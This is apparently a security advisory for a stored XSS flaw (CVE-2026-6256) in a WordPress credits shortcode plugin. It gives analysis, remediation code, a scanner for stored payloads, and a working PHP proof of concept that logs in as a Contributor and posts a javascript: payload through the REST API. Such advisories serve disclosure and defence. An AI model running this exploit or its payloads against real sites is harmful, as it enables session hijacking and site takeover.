Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 15, 2026

CVE-2026-6256: Credits Shortcode <= 1.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'link' Shortcode Attribute (source-shortcode)

CVE ID CVE-2026-6256
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 1.2
Patched Version
Disclosed May 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6256 (metadata-based):

This vulnerability affects the Credits Shortcode plugin for WordPress, version 1.2 and earlier. It allows authenticated attackers with Contributor-level access or higher to perform stored cross-site scripting (XSS) via the ‘link’ attribute of the ‘credits’ shortcode. The CVSS score is 6.4; the reported vector components are network attack vector, low attack complexity, low privileges required, no user interaction, changed scope, and low confidentiality and integrity impact. With no availability impact, that is CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N, which computes to 6.4. The CWE classification is 79 (Improper Neutralization of Input During Web Page Generation, ‘Cross-site Scripting’).

Root Cause: Based on the CWE-79 classification and the vulnerability description, the root cause is missing output escaping of a user-supplied attribute in the ‘credits’ shortcode handler: the value of the ‘link’ attribute is written into the rendered page without being neutralised for its HTML context. This is the classic stored XSS pattern in WordPress shortcodes. The shortcode text is saved as part of the post content; WordPress does pass a Contributor's content through wp_kses (Contributors lack the unfiltered_html capability), but kses filters HTML tags and their attributes, not the text inside a shortcode, so the payload reaches the database unchanged. It is only when the post is rendered and do_shortcode() expands [credits] that the attribute is echoed into the markup. Since no code diff is available, Atomic Edge research infers that the handler merges the attributes (typically via shortcode_atts()) and then echoes or concatenates ‘link’ directly, without esc_url(), esc_attr(), or wp_kses() applied at output. The Contributor-level requirement follows from the fact that anyone who can create or edit a post can place a shortcode in it.

Exploitation: An authenticated attacker with Contributor-level access (or higher) creates or edits a WordPress post and inserts the ‘credits’ shortcode with a malicious payload in the ‘link’ attribute, for example:

[credits link='javascript:alert("XSS")']

The shortcode is stored verbatim in the post content; nothing executes at save time. A Contributor cannot publish, so the post sits in Pending status until an Editor or Administrator reviews or previews it, which renders the shortcode for that privileged user, or publishes it, after which every visitor to the page is exposed. One point the metadata does not settle: a javascript: URL placed in an href only fires when the link is clicked, whereas a value that breaks out of the attribute (a closing quote followed by an event handler) fires on load; which of these works depends on what escaping, if any, the handler applies to the value. The attack vector is any route that writes post content: the classic or block editor, the REST API (POST /wp-json/wp/v2/posts), XML-RPC (wp.newPost, wp.editPost), or the admin AJAX/heartbeat autosave. The plugin plays no part in storing the payload; it only expands the shortcode when the content is rendered, so exploitation simply means creating or updating a post that contains the malicious shortcode.

Remediation: The fix is to escape the ‘link’ attribute for its output context inside the shortcode callback, after merging the attributes with their defaults via shortcode_atts(). For an href, esc_url() is the right call: it only permits the schemes returned by wp_allowed_protocols() (http, https, mailto, tel and so on) and returns an empty string for anything else, so a javascript: payload is dropped rather than merely encoded. esc_attr() is for values written into other HTML attributes, and wp_kses_post() only where the attribute is intentionally allowed to carry an HTML fragment; none of the three substitutes for another, and sanitising on save alone is insufficient because shortcode attributes are stored as raw text and can be edited later. No patched version is listed at the time of writing, so site owners should deactivate or replace the plugin, or virtually patch with a WAF rule that rejects post content containing a ‘credits’ shortcode whose ‘link’ attribute carries a scheme other than http(s) or attribute-breaking characters. Existing posts, including pending drafts and revisions, should also be reviewed for shortcodes that already carry a payload.
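The handler shape inferred in the Root Cause section and the esc_url()/esc_attr() fix described in the Remediation section, side by side, as an added example that is not the Credits Shortcode plugin's own code (the plugin's actual handler is not available here). The callback, the attribute names and the stand-in escaping functions are assumptions: WordPress's esc_url() and esc_attr() are not available outside WordPress, so safe_url() reproduces the one property that matters here (a disallowed URL scheme becomes an empty string) and attr() is htmlspecialchars(). The attribute break-out payload is included as the variant a tester would also try; the advisory itself names only the javascript: URL.

```php
<?php
// Added example, not the plugin's code. Stand-ins for WordPress escaping:

// Stand-in for esc_url(): reject any scheme not on the allow-list, escape the rest.
function safe_url(string $url): string {
    // Browsers ignore whitespace and control characters inside a scheme
    // ("java\tscript:"), so strip them before looking at the scheme.
    $clean = preg_replace('/[\x00-\x20\x7f]+/', '', $url);
    if ($clean === '') {
        return '';
    }
    $allowed = ['http', 'https', 'mailto', 'tel'];
    if (preg_match('#^([a-z][a-z0-9+.\-]*):#i', $clean, $m)
        && !in_array(strtolower($m[1]), $allowed, true)) {
        return ''; // esc_url() likewise returns '' for javascript:, data:, ...
    }
    return htmlspecialchars($clean, ENT_QUOTES, 'UTF-8');
}

// Stand-in for esc_attr(): HTML-encode quotes and angle brackets.
function attr(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Vulnerable shape (assumed): attributes concatenated straight into the markup.
function credits_shortcode_vulnerable(array $atts): string {
    $atts = array_merge(['name' => '', 'link' => ''], $atts); // shortcode_atts() stand-in
    return '<a href="' . $atts['link'] . '">' . $atts['name'] . '</a>';
}

// Hardened shape: URL context gets URL escaping, text content gets HTML escaping.
function credits_shortcode_fixed(array $atts): string {
    $atts = array_merge(['name' => '', 'link' => ''], $atts);
    $href = safe_url($atts['link']);
    $name = attr($atts['name']);
    if ($href === '') {
        return '<span>' . $name . '</span>'; // no usable URL: emit no link at all
    }
    return '<a href="' . $href . '">' . $name . '</a>';
}

// Constructed inputs: the advisory's javascript: URL, an attribute break-out,
// a whitespace-obfuscated scheme, and a legitimate credit link.
$payloads = [
    ['name' => 'Photo: A. Example', 'link' => 'javascript:alert(document.domain)'],
    ['name' => 'Photo: A. Example', 'link' => '" onmouseover="alert(1)'],
    ['name' => 'Photo: A. Example', 'link' => "java\tscript:alert(1)"],
    ['name' => 'Photo: A. Example', 'link' => 'https://example.com/credits?id=1&lang=en'],
];
foreach ($payloads as $p) {
    echo "vulnerable: " . credits_shortcode_vulnerable($p) . "\n";
    echo "fixed:      " . credits_shortcode_fixed($p) . "\n\n";
}
```

Run with php on the command line. The vulnerable output carries the payloads through unchanged (the second one closes the href and adds an event handler), while the fixed output turns the three malicious values into a plain span and encodes the ampersand in the legitimate URL. Note that escaping alone is not a substitute for the allow-list: htmlspecialchars() would leave "javascript:alert(1)" as a perfectly valid, clickable href.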

Impact: Successful exploitation lets the attacker run arbitrary JavaScript in the browser of anyone who renders the post, in the site's own origin. That enables session riding (the script can issue authenticated requests, including REST calls with the victim's nonce), redirection to attacker-controlled sites, defacement, and theft of any data the page exposes; the WordPress authentication cookies themselves are HttpOnly, so the practical route is to act with the victim's session rather than steal it. Because the XSS is stored, it affects every visitor to the page, and because a Contributor's post has to be reviewed by an Editor or Administrator before publication, the first victim is typically a privileged user. A script running in an administrator's session can create a further administrator account or install a plugin, which amounts to full site compromise.
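To find posts that already carry such a payload, here is an added example that is not taken from the advisory or from the plugin: a small PHP scanner over rows from wp_posts. The rows below are constructed; in a real engagement they would come from a query such as SELECT ID, post_author, post_status, post_content FROM wp_posts WHERE post_content LIKE '%[credits%' (revisions and autosaves also live in wp_posts, so do not filter on post_type). The attribute grammar is a simplified version of what WordPress's shortcode_parse_atts() accepts, and the scheme list and break-out check are this example's own heuristics.

```php
<?php
// Added example: hunt for stored [credits ... link="..."] payloads in post content.

// Parse key="v", key='v' and key=v pairs (simplified shortcode_parse_atts()).
function parse_shortcode_atts(string $text): array {
    $atts = [];
    $re = '/(\w+)\s*=\s*"([^"]*)"|(\w+)\s*=\s*\'([^\']*)\'|(\w+)\s*=\s*([^\s\'"\]]+)/';
    if (preg_match_all($re, $text, $m, PREG_SET_ORDER)) {
        foreach ($m as $a) {
            if (!empty($a[1]))     { $atts[strtolower($a[1])] = $a[2]; }
            elseif (!empty($a[3])) { $atts[strtolower($a[3])] = $a[4]; }
            elseif (!empty($a[5])) { $atts[strtolower($a[5])] = $a[6]; }
        }
    }
    return $atts;
}

// Return a reason string if the link value looks like a payload, else null.
function suspicious_link(string $link): ?string {
    $decoded = html_entity_decode($link, ENT_QUOTES, 'UTF-8');
    // Browsers ignore whitespace/control characters in a scheme, so drop them first.
    $scheme_view = preg_replace('/[\s\x00-\x1f]+/', '', $decoded);
    if (preg_match('/^(javascript|data|vbscript):/i', $scheme_view)) {
        return 'dangerous URL scheme';
    }
    if (preg_match('/["\'<>]/', $decoded)) {
        return 'attribute break-out characters';
    }
    return null;
}

// Scan rows shaped like wp_posts and report every credits shortcode with a bad link.
function find_credits_payloads(array $posts): array {
    $hits = [];
    foreach ($posts as $post) {
        if (!preg_match_all('/\[credits\b([^\]]*)\]/i', $post['post_content'], $m, PREG_SET_ORDER)) {
            continue;
        }
        foreach ($m as $sc) {
            $atts = parse_shortcode_atts($sc[1]);
            if (!isset($atts['link'])) {
                continue;
            }
            $why = suspicious_link($atts['link']);
            if ($why !== null) {
                $hits[] = [
                    'ID'     => $post['ID'],
                    'author' => $post['post_author'],
                    'status' => $post['post_status'],
                    'link'   => $atts['link'],
                    'reason' => $why,
                ];
            }
        }
    }
    return $hits;
}

// Constructed sample rows (ID, post_author, post_status, post_content).
$posts = [
    ['ID' => 10, 'post_author' => 2, 'post_status' => 'publish',
     'post_content' => 'Thanks to [credits name="Ana" link="https://example.com/ana"] for the photo.'],
    ['ID' => 11, 'post_author' => 7, 'post_status' => 'pending',
     'post_content' => '[credits name="x" link="javascript:alert(document.cookie)"]'],
    ['ID' => 12, 'post_author' => 7, 'post_status' => 'pending',
     'post_content' => "[credits name='x' link='\" onmouseover=\"alert(1)']"],
    ['ID' => 13, 'post_author' => 7, 'post_status' => 'draft',
     'post_content' => '[credits name="y" link="  JaVaScRiPt:alert(1)"]'],
];
foreach (find_credits_payloads($posts) as $h) {
    printf("post %d (author %d, %s): %s -> %s\n",
        $h['ID'], $h['author'], $h['status'], $h['reason'], $h['link']);
}
```

Posts 11, 12 and 13 are reported and post 10 is not. The author column is what matters next: a single low-privilege account producing several hits is the pivot for the rest of the investigation (when it was created, who else it touched, and whether an Editor has already previewed its pending posts).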

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6256 - Credits Shortcode <= 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'link' Shortcode Attribute

// This PoC demonstrates exploitation via the WordPress REST API.
// An authenticated contributor submits a post containing the malicious shortcode.
// Cookie-authenticated REST requests must carry a valid 'wp_rest' nonce; WordPress
// does not send one in a response header, but a logged-in session can fetch it
// from admin-ajax.php?action=rest-nonce (WordPress 5.3+).
// Contributors cannot publish, so the post is submitted for review ('pending');
// the payload renders when an editor/administrator previews it or once it is published.

$target_url = 'https://example.com'; // CHANGE THIS to your target WordPress URL
$username   = 'contributor';         // CHANGE THIS to a contributor-level username
$password   = 'password';            // CHANGE THIS to the user's password
$cookiejar  = tempnam(sys_get_temp_dir(), 'ae-poc-');

// Send one request through the shared cookie jar; returns [body, HTTP status].
function request(string $url, string $cookiejar, array $opts = []): array {
    $ch = curl_init($url);
    curl_setopt_array($ch, $opts + [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_COOKIEJAR      => $cookiejar,
        CURLOPT_COOKIEFILE     => $cookiejar,
        CURLOPT_SSL_VERIFYPEER => false, // lab targets only
        CURLOPT_USERAGENT      => 'AtomicEdge-PoC/1.0',
    ]);
    $body = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return [$body === false ? '' : $body, $code];
}

// Step 1: Authenticate; wp-login.php sets the auth cookies in the jar
request($target_url . '/wp-login.php', $cookiejar, [
    CURLOPT_POST       => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log'        => $username,
        'pwd'        => $password,
        'rememberme' => 'forever',
        'wp-submit'  => 'Log In',
    ]),
]);

// Step 2: Obtain a REST nonce for the session (a 10-character hex token)
[$nonce, $http_code] = request($target_url . '/wp-admin/admin-ajax.php?action=rest-nonce', $cookiejar);
$nonce = trim($nonce);
if ($http_code !== 200 || !preg_match('/^[0-9a-f]{10}$/', $nonce)) {
    echo "[-] Login or nonce retrieval failed. HTTP code: $http_code\n";
    unlink($cookiejar);
    exit(1);
}

// Step 3: Create a post with the malicious shortcode
$payload = [
    'title'   => 'Atomic Edge Test Post - CVE-2026-6256',
    'content' => '[credits link="javascript:alert(\'XSS by Atomic Edge\')"]',
    'status'  => 'pending', // 'publish' is rejected with 403 for Contributors
];
[$response, $http_code] = request($target_url . '/wp-json/wp/v2/posts', $cookiejar, [
    CURLOPT_POST       => true,
    CURLOPT_POSTFIELDS => json_encode($payload),
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/json',
        'X-WP-Nonce: ' . $nonce,
    ],
]);
unlink($cookiejar);

if ($http_code === 201) {
    echo "[+] Post created successfully. Preview or publish the post to trigger the XSS.\n";
    $data = json_decode($response, true);
    if (isset($data['link'])) {
        echo "[+] Post URL: " . $data['link'] . "\n";
    }
} else {
    echo "[-] Failed to create post. HTTP code: $http_code\n";
    echo "Response: " . $response . "\n";
    echo "Note: This PoC fails if the REST API is disabled for the account, if the login form "
       . "is protected by additional factors, or if the target does not run the plugin.\n";
}
